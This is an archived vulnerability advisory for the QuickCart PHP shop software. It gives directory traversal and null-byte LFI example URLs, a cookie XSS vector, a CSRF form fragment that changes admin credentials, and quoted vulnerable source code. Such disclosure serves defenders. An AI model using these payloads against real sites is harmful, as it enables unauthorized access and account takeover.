AOH :: HP Unsorted Q :: BT-21784.HTM

QuickCart Multiple vlunerabilities



QuickCart Multiple vlunerabilities
QuickCart Multiple vlunerabilities



DISCOVERED: Pawe=C5=82 'kl3ryk' =C5=81askarzewski
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan

DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISITING FILES]-[EXISITING ACTION IN 
THIS FILE]-
Most of actions load templates form bad directory and then throw an exception.

example:
http://victim.com/?p=../actions_admin/settings-config 
#########################
COOKIE XSS
1) in login form in admin.php
You need to change cookie "sLogin" and there put your XSS code. After
that when you will go to http://revival.pl/test/quickcart/admin.php 
you will see your XSS executed.

####templates/admin/loign.tpl
//XSS
######################### XSRF for any admin action POC will change admin login and password in configuration file
action="http://192.168.1.107/quickcart/admin.php?p=settings-config" method="post">
######################### LFI In quick.cart there are two ways to pass parameters to the script: index.php?param1,param2,param3 or index.php?p=param1-param2-param3 In first case our LFI is in param3 in second filename is in param1. Unfourtuenetly both methods have contrains. First change all special chars (including dots into their safe equivalents) and change require that file must be inside actions_client directory. Secend one require from filename php extension example: http://victim.com/nothing,important,our.file.name.html%00 http://victim.com/?p=../path.to.our.php.file-nothing-important EXPLANATION: ####index.php: [CODE] extract( $_GET ); [...] $aActions = isset( $p ) ? getAction( $p ) : getUrlFromGet( ); [...] if( isset( $aActions ) && is_file( 'actions_client/'.$aActions['f'].'.php' ) ) require 'actions_client/'.$aActions['f'].'.php'; [/CODE] getUrlFromGet is function to handle first method and getAction to handle second one. ####libraries/Trash.php [CODE] function getAction( $p ){ global $a; if( ereg( '-', $p ) ){ $aExp = explode( '-', $p ); $iCount = count( $aExp ); for( $i = 0; $i < $iCount; $i++ ){ if( !empty( $aExp[$i] ) ){ if( $i == 0 ) $aActions['f'] = $aExp[$i]; elseif( $i == 1 ) $aActions['a'] = $aExp[$i]; else{ $aActions['o'.( $i - 1 )] = $aExp[$i]; } } } // end for if( !empty( $aActions['f'] ) && !empty( $aActions['a'] ) ){ $a = $aActions['a']; $aActions['sLink'] = '?p='.$p; return $aActions; } } } [/CODE] As we can see in our param string ereg search minus and because our filename is on first position we can't use null byte (%00) to pass filename without php extension. ####core/common.php [CODE] function getUrlFromGet( ){ global $a; if( isset( $_GET ) && is_array( $_GET ) ){ foreach( $_GET as $mKey => $mValue ){ if( strstr( $mKey, ',' ) ){ $mKey = htmlspecialchars( $mKey ); [/CODE] htmlspecialchars destroy our dreams about full LFI bug.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.